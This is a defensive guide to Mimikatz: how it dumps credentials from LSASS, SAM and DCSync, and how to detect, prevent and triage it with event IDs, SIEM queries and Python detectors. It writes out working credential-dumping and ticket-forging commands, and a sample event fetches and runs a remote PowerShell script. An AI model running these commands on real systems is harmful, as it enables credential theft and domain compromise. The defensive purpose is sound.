Mimikatz

How Mimikatz extracts plaintext passwords, NTLM hashes, and Kerberos tickets from Windows memory — and how analysts detect it running in their environment with Event IDs, Sysmon rules, and SIEM queries.


What Mimikatz Is and What It Extracts From Windows Memory

  • Mimikatz is an open-source post-exploitation tool written by Benjamin Delpy (gentilkiwi) that extracts plaintext passwords, NTLM hashes, Kerberos tickets and keys, PINs, and certificates from Windows memory and from the registry.
  • MITRE ATT&CK maps credential dumping to T1003 (OS Credential Dumping); the sub-techniques Mimikatz is best known for are T1003.001 (LSASS Memory), T1003.002 (Security Account Manager), and T1003.006 (DCSync).
  • Mimikatz is the best-known implementation of these techniques, and most other credential-dumping tooling reuses its approach or its code.
  • The tool is not malware in itself: it is a research tool that talks to the Windows authentication subsystems at the API level. It shows up in most ransomware and APT intrusions because the credentials it yields drive lateral movement (map AD attack paths with BloodHound), privilege escalation, and persistence.

Credential Extraction Commands — What Mimikatz Actually Does

LSASS Memory Dump (sekurlsa::logonpasswords)

The most famous Mimikatz command. It accesses the LSASS process (Local Security Authority Subsystem Service) and extracts credentials stored in memory — including plaintext passwords, NTLM hashes, and Kerberos tickets.

mimikatz # sekurlsa::logonpasswords

What it extracts:

Credential type | Format | How the attacker uses it
--- | --- | ---
Plaintext password | username, domain and password from a provider that keeps reversible secrets (WDigest, some SSPs) | Immediate authentication, no cracking needed
NTLM hash | NT hash per logon session (often re-exported in pwdump style as username:RID:LM:NT:::) | Pass-the-Hash lateral movement (sekurlsa::pth)
Kerberos TGT and service tickets | .kirbi files (sekurlsa::tickets /export) | Pass-the-Ticket (kerberos::ptt) to reuse the session without knowing the password
Kerberos AES keys | 128/256-bit keys (sekurlsa::ekeys) | Overpass-the-Hash / pass-the-key where NTLM is blocked or AES is enforced; a stolen krbtgt or service account key also enables ticket forgery

Why this works: Windows caches credential material in LSASS so users can reach network resources without re-entering passwords. The WDigest provider used to keep the plaintext password in memory; that is off by default since Windows 8.1 / Server 2012 R2 (and on older systems once KB2871997 is installed), but an attacker with admin rights can turn it back on by setting HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential to 1 and waiting for the next interactive logon. Even without WDigest, NT hashes, Kerberos tickets and Kerberos keys remain readable by sekurlsa::logonpasswords unless LSASS itself is protected (Credential Guard or RunAsPPL, see Prevention below).

DCSync (lsadump::dcsync)

A more powerful technique that needs no code execution on a Domain Controller. The attacker uses an account that holds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain naming context (Domain Admins, Enterprise Admins and DC computer accounts have them by default; the Azure AD Connect MSOL_ account is a common legitimate holder) and asks a DC to replicate directory data, exactly as another DC would. The reply contains every user's NT hash, password history and Kerberos keys.

mimikatz # lsadump::dcsync /user:krbtgt

Why DCSync is so dangerous: it returns the krbtgt account's keys, which let the attacker forge Golden Tickets (Kerberos TGTs that authenticate as anyone to any service in the domain). Because the exchange is ordinary DRSUAPI (MS-DRSR) replication traffic, nothing executes on the DC and no LSASS process-access event is produced there. The DC does record the replication request as Security Event ID 4662 when Directory Service Access auditing is enabled (see Detection Layer 4), which is the main host-side hook for catching it.

SAM Registry Dump (lsadump::sam)

Dumps the local SAM (Security Account Manager) registry hive and extracts the NT hashes of local accounts. Requires local administrator rights and, in practice, a SYSTEM token (token::elevate), because the SAM and SECURITY hives are readable only by SYSTEM.

mimikatz # lsadump::sam

Kerberos Ticket Extraction and Manipulation

Command | Purpose
--- | ---
kerberos::list | List the cached Kerberos tickets of the current logon session
kerberos::ptt ticket.kirbi | Pass-the-Ticket: inject a stolen Kerberos ticket into the current session
kerberos::golden /user:admin /domain:corp.com /sid:S-1-5-... /krbtgt:hash /ptt | Forge a Golden Ticket (a TGT valid for any service in the domain) from the krbtgt key
kerberos::golden /user:admin /domain:corp.com /sid:S-1-5-... /target:DC.corp.com /service:cifs /rc4:hash /ptt | Forge a Silver Ticket (a service ticket valid only for that service on that host). Mimikatz has no separate silver command: the same module is given the target service account's key instead of the krbtgt key

Privilege and Token Manipulation (privilege::debug, token::elevate)

Reading LSASS memory requires SeDebugPrivilege. Administrators hold it but it is disabled in their tokens by default; privilege::debug enables it for the Mimikatz process. token::elevate goes further and impersonates a SYSTEM token, which the registry-based modules (lsadump::sam, lsadump::secrets) need because the SAM and SECURITY hives are readable only by SYSTEM. Both steps are loud: enabling SeDebugPrivilege is logged as Security Event 4703 where token-right auditing is on, and the handle to LSASS that follows is the Sysmon Event 10 record that detection relies on.

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # token::elevate
mimikatz # lsadump::sam

Detection — How to Find Mimikatz Running in Your Environment

Mimikatz is detectable at multiple layers: process-level signatures, event log patterns, network behavior, and memory artifacts. The most effective detection combines all four.

Detection Layer 1 — Process and Command-Line Detection

Sysmon Event ID 1 (Process Creation) with CommandLine logging:

Mimikatz often uses distinctive command-line patterns, especially when launched via PowerShell or Cobalt Strike:

Indicator | What to watch for
--- | ---
Process name | mimikatz.exe, mimikatz64.exe, mimikatz32.exe; attackers routinely rename the binary, so also key on the OriginalFileName and Hashes (including IMPHASH) fields of Sysmon Event ID 1
Command-line arguments | sekurlsa::logonpasswords, lsadump::dcsync, kerberos::golden, lsadump::sam, token::elevate, privilege::debug
Debug privilege enablement | privilege::debug enables SeDebugPrivilege; Security Event 4703 (token right adjusted) records it, but that event is noisy and the LSASS handle open that follows is the better signal
LSASS process access by anything other than the expected system components | Sysmon Event ID 10 with TargetImage lsass.exe; the single strongest host indicator of credential dumping

SPL query — detect Mimikatz command-line patterns:

index=windows sourcetype=WinEventLog:Sysmon EventCode=1
| search CommandLine IN ("*sekurlsa::logonpasswords*", "*lsadump::dcsync*", "*lsadump::sam*", "*kerberos::golden*", "*token::elevate*")
| eval severity = "CRITICAL — Mimikatz or similar credential dumping tool detected"
| table _time, Computer, User, Image, CommandLine, severity

SPL query — detect LSASS process access by non-standard processes (Sysmon Event ID 10) — run in Splunk. Exclude known-good sources by full path (a renamed binary can borrow any file name), and expect to add your AV/EDR engine to the list after baselining:

index=windows sourcetype=WinEventLog:Sysmon EventCode=10 TargetImage="*\\lsass.exe"
| search NOT SourceImage IN ("C:\\Windows\\System32\\wmiprvse.exe", "C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\System32\\csrss.exe", "C:\\Windows\\System32\\wininit.exe")
| eval GrantedAccess=lower(GrantedAccess)
| eval alert=case(
    match(CallTrace, "UNKNOWN"), "CRITICAL: LSASS accessed from unbacked memory (injected code)",
    in(GrantedAccess, "0x1010", "0x1410", "0x1438", "0x143a"), "CRITICAL: VM_READ handle to LSASS (sekurlsa-style credential read)",
    in(GrantedAccess, "0x1fffff", "0x1f0fff"), "HIGH: PROCESS_ALL_ACCESS handle to LSASS (full dump or injector)",
    true(), "MEDIUM: LSASS accessed by non-standard process, investigate")
| stats count, values(GrantedAccess) as Masks, values(alert) as Alerts, min(_time) as first_seen, max(_time) as last_seen by Computer, SourceImage
| convert ctime(first_seen) ctime(last_seen)
| table first_seen, last_seen, Computer, SourceImage, count, Masks, Alerts

GrantedAccess codes that indicate credential dumping (Mimikatz does not need PROCESS_ALL_ACCESS; the right that matters is PROCESS_VM_READ, 0x10):

Access code | Meaning | Detection priority
--- | --- | ---
0x1010 | PROCESS_VM_READ + PROCESS_QUERY_INFORMATION, the minimum sekurlsa needs and Mimikatz's classic handle | CRITICAL
0x1410, 0x1438, 0x143A | The same plus PROCESS_QUERY_LIMITED_INFORMATION and, for the larger masks, VM_OPERATION / VM_WRITE / CREATE_THREAD; seen from other dumpers and in-memory ports | CRITICAL
0x1FFFFF | PROCESS_ALL_ACCESS; full-dump tools (procdump, Task Manager, comsvcs.dll MiniDump) and injectors | HIGH
0x1F0FFF | PROCESS_ALL_ACCESS as defined before Windows Vista, still used by older tooling | HIGH
0x1000 | PROCESS_QUERY_LIMITED_INFORMATION only, no memory read; normal for monitoring and inventory tools | LOW

Detection Layer 2 — Windows Security Event Logs

Event ID 4688 (Process Creation with CommandLine):

If Sysmon is not deployed, native Windows Event ID 4688 can detect Mimikatz, but only when the "Include command line in process creation events" policy (Computer Configuration > Administrative Templates > System > Audit Process Creation) is enabled; without it the event carries no command line at all. The field names below are the XML-rendered ones (renderXml=true); adjust them if your add-on flattens the message text instead.

index=windows sourcetype=WinEventLog:Security EventCode=4688
| search CommandLine IN ("*sekurlsa::*", "*lsadump::*", "*kerberos::golden*", "*privilege::debug*", "*Invoke-Mimikatz*")
| eval alert = "CRITICAL: potential credential dumping detected via Windows Event 4688"
| table _time, Computer, SubjectUserName, NewProcessName, CommandLine, alert

Event ID 4656 / 4663 (Object Access with a SACL on the LSASS process object):

Event 4670 ("Permissions on an object were changed") does not record process access. What does is a system access control list on the lsass.exe process object together with the Kernel Object audit subcategory: every handle request then produces Event 4656 (A handle to an object was requested) and every use of it Event 4663 (An attempt was made to access an object). This is rarely done in practice because the SACL lives on the process object and has to be reapplied after every boot, and Sysmon Event 10 covers the same ground with far less effort; treat it as a fallback.

auditpol /set /subcategory:"Kernel Object" /success:enable /failure:enable

Then query:

index=windows sourcetype=WinEventLog:Security (EventCode=4656 OR EventCode=4663) ObjectType=Process ObjectName="*\\lsass.exe"
| search AccessMask IN ("0x1010", "0x1410", "0x1438", "0x143a", "0x1fffff")
| table _time, Computer, SubjectUserName, ProcessName, AccessMask

Detection Layer 3 — PowerShell and Script-Based Detection

Mimikatz is frequently loaded in memory via PowerShell (Invoke-Mimikatz from PowerSploit performs reflective PE injection of the Mimikatz DLL) so the binary never touches disk. Script Block Logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) records the script as the engine compiles it, after string concatenation and escaping have been resolved, so it sees through most obfuscation. Event 4103 (module logging) records pipeline execution details but does not carry ScriptBlockText, so query 4104. Long scripts are split across several 4104 events that share a ScriptBlockId.

SPL query — detect Mimikatz in PowerShell script block logs:

index=windows sourcetype="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104
| search ScriptBlockText IN ("*mimikatz*", "*Invoke-Mimikatz*", "*sekurlsa::*", "*lsadump::*", "*logonpasswords*", "*gentilkiwi*")
| eval alert = "CRITICAL: Mimikatz loaded in PowerShell, in-memory credential dumping"
| table _time, Computer, UserID, ScriptBlockId, ScriptBlockText, alert

SPL query — detect PowerShell reflective loading (no Mimikatz string, anomalous behaviour):

index=windows sourcetype="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104
| search (ScriptBlockText="*System.Reflection.Assembly*Load*" AND ScriptBlockText="*byte[*") OR ScriptBlockText="*VirtualAlloc*" OR ScriptBlockText="*GetDelegateForFunctionPointer*"
| eval alert = "HIGH: PowerShell mapping code into memory from a byte array, possible reflective PE/DLL injection"
| table _time, Computer, ScriptBlockText, alert

KQL query — detect Mimikatz via PowerShell in Microsoft 365 Defender:

DeviceProcessEvents
| where FileName == "powershell.exe" or FileName == "pwsh.exe"
| where ProcessCommandLine has_all ("sekurlsa", "logonpasswords") or
        ProcessCommandLine has_any ("Invoke-Mimikatz", "DCSync", "mimikatz")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine
| sort by Timestamp desc
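Command-line and script-block matching as above breaks on trivial tricks such as backtick escapes (I`nvoke-Mimikatz), string concatenation ('Inv'+'oke-Mimikatz') and -EncodedCommand payloads. The following added example (not code from the original page or from PowerSploit) normalises those three forms and decodes the base64/UTF-16LE encoded command before matching a small indicator list; the indicator list and the sample events are constructed assumptions, and the normaliser deliberately covers only parse-time tricks, not runtime ones such as -join or [char] arrays, which only Script Block Logging resolves.

```python
"""Find Mimikatz indicators in PowerShell telemetry despite simple obfuscation.

Added example, not code from the original page or from PowerSploit. The
indicator list and the sample events are constructed assumptions.
"""
from __future__ import annotations

import base64
import re

INDICATORS = (
    "invoke-mimikatz", "mimikatz", "gentilkiwi", "sekurlsa::", "lsadump::",
    "logonpasswords", "kerberos::golden", "kerberos::ptt", "privilege::debug",
)

# -EncodedCommand and its short forms carry base64 of UTF-16LE text.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(command_line: str) -> str | None:
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def normalize(text: str) -> str:
    """Undo the obfuscation that PowerShell resolves at parse time."""
    text = text.replace("`", "")                       # I`nvoke-Mi`mikatz -> Invoke-Mimikatz
    text = re.sub(r"""(['"])\s*\+\s*\1""", "", text)    # 'Inv'+'oke' -> 'Invoke'
    text = re.sub(r"""['"]""", "", text)                # drop the remaining quotes
    return re.sub(r"\s+", " ", text).lower()


def scan(event: dict) -> dict:
    """Match indicators in ScriptBlockText and/or a (decoded) command line."""
    texts = []
    decoded = None
    if event.get("ScriptBlockText"):
        texts.append(event["ScriptBlockText"])
    if event.get("CommandLine"):
        texts.append(event["CommandLine"])
        decoded = decode_encoded_command(event["CommandLine"])
        if decoded:
            texts.append(decoded)
    haystack = " ".join(normalize(t) for t in texts)
    hits = sorted({i for i in INDICATORS if i in haystack})
    return {"hits": hits, "decoded": decoded, "suspicious": bool(hits)}


def _enc(ps: str) -> str:
    """Build a -EncodedCommand argument the way powershell.exe expects it."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample events: Event 4104 ScriptBlockText and Sysmon Event 1 CommandLine.
SAMPLE_EVENTS = [
    {"ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1'); "
                        "Invoke-Mimikatz -Command '\"sekurlsa::logonpasswords\"'"},
    {"ScriptBlockText": "& ('Inv'+'oke-Mi'+'mikatz') -Command ('se'+'kurlsa::logon'+'passwords')"},
    {"ScriptBlockText": "I`nvoke-Mim`ikatz -DumpCreds"},
    {"CommandLine": "powershell.exe -NoP -W Hidden -enc " + _enc("Invoke-Mimikatz -DumpCreds")},
    {"ScriptBlockText": "Get-Process lsass | Select-Object Id, WorkingSet"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        result = scan(ev)
        print(result["suspicious"], result["hits"], result["decoded"])
```

Run the same function over your Sysmon Event 1 command lines and your 4104 script blocks; the decoded payload is worth storing alongside the alert, since the base64 blob itself tells the analyst nothing.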

Detection Layer 4 — Network Indicators

While Mimikatz is primarily a host-based tool, DCSync is a protocol exchange over the network, and a replication request from anything other than a DC stands out on the wire:

Indicator | Description
--- | ---
DRSUAPI replication request from a non-DC host | Only Domain Controllers (and known sync services such as Azure AD Connect) should call IDL_DRSGetNCChanges. The DRSUAPI RPC interface is identified by UUID e3514235-4b06-11d1-ab04-00c04fc2dcd2 and is visible in Zeek dce_rpc logs or IDS rules that decode MS-RPC
Endpoint mapper (TCP 135) lookup for DRSUAPI from a workstation | DCSync first asks the DC's endpoint mapper where the directory replication service listens; workstations have no reason to do this
Privileged account authenticating from a workstation immediately before the replication call | The account used for DCSync must hold the replication rights, so a Domain Admin (or sync account) logon from an unusual source followed by DRSUAPI traffic is the complete pattern

SPL query — detect DCSync via Directory Service access auditing (Security Event ID 4662 on the DC):

Event 4662 is only written when "Audit Directory Service Access" is enabled and the domain naming context carries a SACL that audits the replication control-access rights. The Properties field lists the rights exercised as GUIDs, not names. DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) is the right that returns secrets, so key on it, and exclude the principals that legitimately replicate: DC computer accounts and any directory-sync service account.

index=windows sourcetype=WinEventLog:Security EventCode=4662 AccessMask=0x100
| search Properties="*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*" OR Properties="*89e95b76-444d-4c62-991a-0facbeda640c*"
| search NOT SubjectUserName="*$" NOT SubjectUserName="MSOL_*"
| eval alert = "CRITICAL: DCSync, replication rights exercised by a non-DC account"
| table _time, Computer, SubjectUserName, SubjectDomainName, ObjectName, Properties, alert
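The same logic as a reusable function, so it can run over exported 4662 events outside the SIEM: this is an added example, not code from the original page, and the DC account list, the sync-account list and the sample events are constructed assumptions. The right GUIDs are the schema's extended-rights GUIDs for the three replication rights; the domain object and user class GUIDs in the samples are only there to make the Properties field look like the real one.

```python
"""Flag DCSync from Windows Security Event 4662 records on a Domain Controller.

Added example, not code from the original page. DC/sync account lists and
sample events are constructed assumptions.
"""
from __future__ import annotations

import re

# Extended rights that govern directory replication (schema rightsGuid values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
CONTROL_ACCESS = 0x100  # AccessMask bit for "Control Access" (extended right use)
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.IGNORECASE)


def replication_rights(properties: str) -> list[str]:
    """Names of the replication rights present in a 4662 Properties field."""
    found = [g.lower() for g in GUID_RE.findall(properties)]
    return [REPLICATION_RIGHTS[g] for g in found if g in REPLICATION_RIGHTS]


def is_dcsync(event: dict, dc_accounts: set[str], sync_accounts: set[str]) -> dict | None:
    """Return a finding when replication rights are used by an unexpected principal."""
    if event.get("EventCode") != "4662":
        return None
    if int(event.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS == 0:
        return None
    rights = replication_rights(event.get("Properties", ""))
    if not rights:
        return None
    subject = event["SubjectUserName"]
    expected = {a.upper() for a in dc_accounts | sync_accounts}
    if subject.upper() in expected:
        return None  # DCs and the directory-sync service replicate by design
    guids = {g.lower() for g in GUID_RE.findall(event["Properties"])}
    if GET_CHANGES_ALL in guids:
        severity = "CRITICAL"  # secret attributes (NT hashes, Kerberos keys) are returned
    elif FILTERED_SET in guids:
        severity = "HIGH"      # RODC-style filtered replication, still abnormal off a DC
    else:
        return None            # Get-Changes alone does not return secrets
    return {"severity": severity, "subject": subject, "rights": rights,
            "object": event.get("ObjectName", ""), "dc": event.get("Computer", "")}


def findings(events: list[dict], dc_accounts: set[str], sync_accounts: set[str]) -> list[dict]:
    return [f for f in (is_dcsync(e, dc_accounts, sync_accounts) for e in events) if f]


DC_ACCOUNTS = {"DC01$", "DC02$"}        # assumption: your DC computer accounts
SYNC_ACCOUNTS = {"MSOL_a1b2c3d4e5f6"}   # assumption: your Azure AD Connect account

# Constructed Properties strings in the shape Windows writes them.
PROPS_ALL = ("{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\r\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\r\n"
             "{19195a5b-6da0-11d0-afd3-00c04fd930c9}")
PROPS_GET_ONLY = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\r\n{19195a5b-6da0-11d0-afd3-00c04fd930c9}"

SAMPLE_EVENTS = [
    {"EventCode": "4662", "Computer": "DC01.corp.example", "SubjectUserName": "DC02$",
     "AccessMask": "0x100", "ObjectName": "DC=corp,DC=example", "Properties": PROPS_ALL},
    {"EventCode": "4662", "Computer": "DC01.corp.example", "SubjectUserName": "bob",
     "AccessMask": "0x100", "ObjectName": "DC=corp,DC=example", "Properties": PROPS_ALL},
    {"EventCode": "4662", "Computer": "DC01.corp.example", "SubjectUserName": "MSOL_a1b2c3d4e5f6",
     "AccessMask": "0x100", "ObjectName": "DC=corp,DC=example", "Properties": PROPS_ALL},
    {"EventCode": "4662", "Computer": "DC01.corp.example", "SubjectUserName": "alice",
     "AccessMask": "0x100", "ObjectName": "DC=corp,DC=example", "Properties": PROPS_GET_ONLY},
    {"EventCode": "4662", "Computer": "DC01.corp.example", "SubjectUserName": "bob",
     "AccessMask": "0x10", "ObjectName": "CN=bob,CN=Users,DC=corp,DC=example",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for f in findings(SAMPLE_EVENTS, DC_ACCOUNTS, SYNC_ACCOUNTS):
        print(f["severity"], f["subject"], f["rights"], f["object"], "on", f["dc"])
```

Only the second sample is reported: the DC and the sync account are expected replicators, alice holds Get-Changes without Get-Changes-All and therefore cannot pull secrets, and the last record is an ordinary attribute read with no control-access bit.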

Detection Layer 5 — Memory Artifacts

If you have a memory image (from a forensic acquisition) or an EDR that can scan process memory:

Artifact | What to look for
--- | ---
Mimikatz strings in process memory | sekurlsa, lsadump, gentilkiwi, mimikatz and the module banner text inside any process other than the Mimikatz binary itself (for example a PowerShell or svchost.exe process hosting an injected copy). Note that wdigest.dll, kerberos.dll and msv1_0.dll are legitimately loaded in LSASS and are not indicators
Unbacked executable memory | Volatility malfind (or equivalent) hits: private, executable regions holding a PE header or shellcode in powershell.exe, rundll32.exe or system processes, the footprint of Invoke-Mimikatz and Cobalt Strike's execute-assembly
LSASS dump files | MiniDump files (lsass.dmp or renamed) written by procdump, Task Manager or comsvcs.dll MiniDump; Mimikatz parses these offline with sekurlsa::minidump, so the dump itself is the credential theft
Alternate Data Streams | Mimikatz staged in an ADS of a legitimate file
Process hollowing / injection | A renamed mimikatz.exe or its DLL injected into svchost.exe, RuntimeBroker.exe or other system processes; compare the in-memory image against the on-disk file

Prevention — Making Mimikatz Extraction Harder

Control | What it protects | Implementation
--- | --- | ---
Credential Guard | Moves NT hashes, Kerberos keys and TGTs into an isolated LSA process (LsaIso.exe) inside a virtualization-based security enclave; even SYSTEM cannot read them out of lsass.exe | Group Policy: Computer Configuration > Administrative Templates > System > Device Guard > Turn On Virtualization Based Security, with Credential Guard Configuration set to Enabled (with or without UEFI lock). Requires Secure Boot and VBS-capable hardware
LSA Protection (RunAsPPL) | Runs LSASS as a Protected Process Light so unsigned or non-Microsoft code cannot open it with VM_READ, whatever its privilege | Set HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL (REG_DWORD) to 1. A bypass exists through Mimikatz's signed mimidrv.sys kernel driver (!processprotect /process:lsass.exe /remove), which is why the vulnerable-driver blocklist and the ASR rule below matter
WDigest disabled | Stops the plaintext password from being kept in LSASS | Set HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential (REG_DWORD) to 0, and alert on any change of that value to 1
Restricted Admin Mode (RDP) | Keeps the administrator's credentials off the remote host during an RDP session. The trade-off is that it allows RDP with only an NT hash, so prefer Remote Credential Guard where it is supported | New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name DisableRestrictedAdmin -PropertyType DWORD -Value 0 (a value of 0 enables the mode)
Debug privilege restriction | Without SeDebugPrivilege a process, even one running as Administrator, cannot open LSASS for reading | Remove groups that do not need it from the "Debug programs" user right in GPO. By default only Administrators hold it; removing it there breaks some debugging and backup tooling, so test first
ASR rule | Blocks handle opens on lsass.exe from anything outside a trusted set, regardless of privilege | Enable the Defender Attack Surface Reduction rule "Block credential stealing from the Windows local security authority subsystem (lsass.exe)" in block mode

Implementation order (most effective first):

  1. Credential Guard + LSASS RunAsPPL — stops the vast majority of mimikatz attacks
  2. Disable WDigest — prevents plaintext password extraction
  3. ASR Rule for LSASS — blocks the process access pattern
  4. Enable command-line logging — detects what gets past the first three layers

Mimikatz Triage — Investigation Workflow

Step 1: Confirm the Detection

Finding | Confidence | Action
--- | --- | ---
Sysmon Event 10: a process outside the expected set opens lsass.exe with a VM_READ mask (0x1010, 0x1410, 0x1FFFFF, ...) | HIGH | Proceed to Step 2
Windows Event 4688 or Sysmon Event 1 with sekurlsa::logonpasswords on the command line | CRITICAL | Immediate containment
PowerShell script block contains Invoke-Mimikatz, or maps a byte array into executable memory without a known-good script name | HIGH | Proceed to Step 2
Event 4662: DS-Replication-Get-Changes-All exercised by an account that is neither a DC nor a sync service | CRITICAL | Immediate containment

Step 2: Determine Scope

  • Which account executed Mimikatz? Was it a standard user (escalated), or an admin? Check Event 4688 for SubjectUserName.
  • What credentials were extracted? Any user logged on to the compromised system had their credentials cached in LSASS — assume all are compromised.
  • How was Mimikatz delivered? Dropped as a file? In-memory PowerShell? Cobalt Strike execute-assembly?

Step 3: Immediate Containment

  1. Isolate the host — network-contain it from the EDR console or pull it off the network, but keep it powered on for the memory capture in Step 4
  2. Check for lateral movement — the logs never contain the hash itself, only its use: Event 4624 Logon Type 3 with AuthenticationPackageName NTLM whose IpAddress is the compromised host, Event 4776 on the DCs naming that workstation, and Event 4768 TGT requests with RC4 encryption (TicketEncryptionType 0x17) from that host, which is what overpass-the-hash looks like in a domain that otherwise uses AES
  3. Reset the krbtgt password twice — if DCSync was performed, assume Golden Tickets exist; only the second reset, done after the first has replicated, invalidates tickets signed with the old key
  4. Reset the passwords of all service accounts that had sessions on the host — their hashes were cached in LSASS
  5. Rotate every credential that was active on the compromised system during the extraction window, starting with privileged accounts, and rotate local Administrator passwords if lsadump::sam ran
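Step 2 of the containment list is the one analysts most often get wrong, because Logon Type 3 NTLM logons from a workstation are normal for SMB and the hash never appears in any event. The following added example (not code from the original page) correlates exported 4624 and 4768 records against the compromised host's IP after the detection time and groups the results by reached host and account, which is the input for the reset list in steps 4 and 5. The events are constructed; in production the output still needs a baseline comparison, since what matters is the new (host, account) pairs, especially privileged ones.

```python
"""Hunt pass-the-hash and overpass-the-hash from a compromised host.

Added example, not code from the original page. Sample events are constructed.
"""
from __future__ import annotations

from datetime import datetime

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4-HMAC; AES is 0x11 / 0x12


def _ip(value: str) -> str:
    """4768/4624 write IPv4 as '::ffff:a.b.c.d' on some builds; normalise it."""
    return value[len("::ffff:"):] if value.lower().startswith("::ffff:") else value


def _ts(value: str) -> datetime:
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def lateral_movement(events: list[dict], source_ip: str, since: str) -> list[dict]:
    """NTLM network logons and RC4 TGT requests sourced from source_ip after since."""
    start = _ts(since)
    out = []
    for e in events:
        if _ts(e["TimeCreated"]) < start or _ip(e.get("IpAddress", "")) != source_ip:
            continue
        if (e["EventCode"] == "4624" and e.get("LogonType") == "3"
                and e.get("AuthenticationPackageName", "").upper() == "NTLM"):
            # Pass-the-hash: NTLM authentication to a remote host using the stolen NT hash.
            out.append({"time": e["TimeCreated"], "technique": "pass-the-hash (NTLM type 3)",
                        "target": e["Computer"], "account": e["TargetUserName"]})
        elif (e["EventCode"] == "4768" and e.get("TicketEncryptionType", "").lower() == RC4_HMAC
                and e.get("Status") == "0x0"):
            # Overpass-the-hash: a TGT requested with the NT hash as the RC4 key
            # (sekurlsa::pth); the "target" here is the DC that issued the ticket.
            out.append({"time": e["TimeCreated"], "technique": "overpass-the-hash (RC4 TGT)",
                        "target": e["Computer"], "account": e["TargetUserName"]})
    return sorted(out, key=lambda f: f["time"])


def targets(found: list[dict]) -> dict[str, set[str]]:
    """Accounts used per reached host, the seed of the credential-reset list."""
    per_host: dict[str, set[str]] = {}
    for f in found:
        per_host.setdefault(f["target"], set()).add(f["account"])
    return per_host


COMPROMISED_IP = "10.0.0.23"          # assumption: host where Mimikatz was detected
DETECTED_AT = "2024-03-12T10:05:00Z"  # assumption: time of the Sysmon Event 10 alert

# Constructed Security events from a file server (FS01) and a DC (DC01).
SAMPLE_EVENTS = [
    # before detection: routine SMB access, dropped by the time filter
    {"EventCode": "4624", "TimeCreated": "2024-03-12T09:50:10Z", "Computer": "FS01.corp.example",
     "LogonType": "3", "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.23", "TargetUserName": "bob"},
    # pass-the-hash as a domain admin to the file server and then to the DC
    {"EventCode": "4624", "TimeCreated": "2024-03-12T10:07:41Z", "Computer": "FS01.corp.example",
     "LogonType": "3", "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.23", "TargetUserName": "da-jsmith"},
    {"EventCode": "4624", "TimeCreated": "2024-03-12T10:09:02Z", "Computer": "DC01.corp.example",
     "LogonType": "3", "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.23", "TargetUserName": "da-jsmith"},
    # overpass-the-hash: RC4 TGT for a service account in an AES-only domain
    {"EventCode": "4768", "TimeCreated": "2024-03-12T10:12:30Z", "Computer": "DC01.corp.example",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.0.0.23", "TargetUserName": "svc-sql"},
    # Kerberos network logon from the same host: not NTLM, ignored
    {"EventCode": "4624", "TimeCreated": "2024-03-12T10:13:00Z", "Computer": "FS01.corp.example",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.0.23", "TargetUserName": "bob"},
    # a different source host entirely
    {"EventCode": "4624", "TimeCreated": "2024-03-12T10:14:00Z", "Computer": "FS01.corp.example",
     "LogonType": "3", "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.77", "TargetUserName": "carol"},
]

if __name__ == "__main__":
    found = lateral_movement(SAMPLE_EVENTS, COMPROMISED_IP, DETECTED_AT)
    for f in found:
        print(f["time"], f["technique"], f["account"], "->", f["target"])
    for host, accounts in targets(found).items():
        print(host, sorted(accounts))
```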

Step 4: Forensic Preservation

  • Capture a full memory image before rebooting: an in-memory Mimikatz and any injected code survive only until the hosting process exits or the system restarts
  • Capture the original binary, PowerShell script or beacon that loaded Mimikatz, including anything staged in an alternate data stream
  • Export the Sysmon, Security and PowerShell Operational logs for a generous window around the event (hours before it, not seconds, because the loader and the initial access precede the dump) and copy them off the host so a rollback or wipe cannot destroy them
